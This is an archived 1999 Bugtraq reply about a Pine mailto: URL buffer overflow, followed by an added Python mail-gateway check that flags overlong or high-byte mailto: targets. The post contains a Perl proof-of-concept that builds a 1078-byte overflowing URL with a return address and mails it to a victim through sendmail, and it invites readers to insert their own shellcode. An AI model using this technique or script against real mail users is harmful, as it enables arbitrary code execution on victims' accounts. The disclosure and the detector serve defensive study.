Bugtraq mailing list archives
Re: Caldera Pine Advisory
From: fygrave () EPR0 ORG (CyberPsychotic)
Date: Thu, 18 Nov 1999 21:43:14 +0500
~: Versions of pine prior to 4.21 had a security problem when viewing
~: URLs. By sending an email with a specially formatted URL embedded
~: in it, an attacker could cause arbitrary shell code to be executed
~: under the account of the victim user.
~:
I don't know how dumb a user should be to actually become a victim of
such exploitation. Not saying that the bug shouldn't be fixed anywayz.
If anyone's interested:
#!/usr/bin/perl
$sploit="A" x 1078;
$sploit .="\@1111"; # rh 6.0/pine4.10 would love return address 0x82d4528
# or higher..
open(FOO,"| /usr/sbin/sendmail -t");
print FOO "From: bogus\@yahoo.com\nTo: victim\@somehost\n\n";
print FOO "Mail me: mailto:$sploit";
close(FOO);
pull any shellcode you like (but mind it should contain only printable
characters 0x20-xff worked for me).
-Fyodor
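
Added example, not part of the original post or of pine: a mail-gateway style check that flags messages whose body carries a mailto: URL of the shape the script above generates (a very long target, or bytes at or above 0x80). The function name and the 254-character limit are assumptions made for this example; the sample messages are constructed.

```python
import re
from email import message_from_string

# Assumed policy value (not from the post): 254 characters is the commonly
# cited practical maximum length of an e-mail address.
MAX_MAILTO_LEN = 254
MAILTO_RE = re.compile(r"mailto:(\S+)", re.IGNORECASE)


def suspicious_mailto(raw_message):
    """Return (target_length, reasons) for each abnormal mailto: target."""
    msg = message_from_string(raw_message)
    findings = []
    for part in msg.walk():
        # Only text parts are rendered with clickable URLs; skip the rest.
        if part.get_content_maintype() != "text":
            continue
        payload = part.get_payload(decode=True) or b""
        body = payload.decode("latin-1")  # byte-preserving decode
        for match in MAILTO_RE.finditer(body):
            target = match.group(1)
            reasons = []
            if len(target) > MAX_MAILTO_LEN:
                reasons.append("overlong")
            if any(ord(ch) >= 0x80 for ch in target):
                reasons.append("high-byte")
            if reasons:
                findings.append((len(target), ",".join(reasons)))
    return findings


# Constructed sample messages (hypothetical addresses).
HEADERS = "From: a@example.org\nTo: b@example.org\n\n"
BENIGN = HEADERS + "Mail me: mailto:alice@example.org\n"
# Same shape as the message built by the script in the post.
OVERLONG = HEADERS + "Mail me: mailto:" + "A" * 1078 + "@1111\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("overlong", OVERLONG)):
        print(name, suspicious_mailto(sample))
```
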
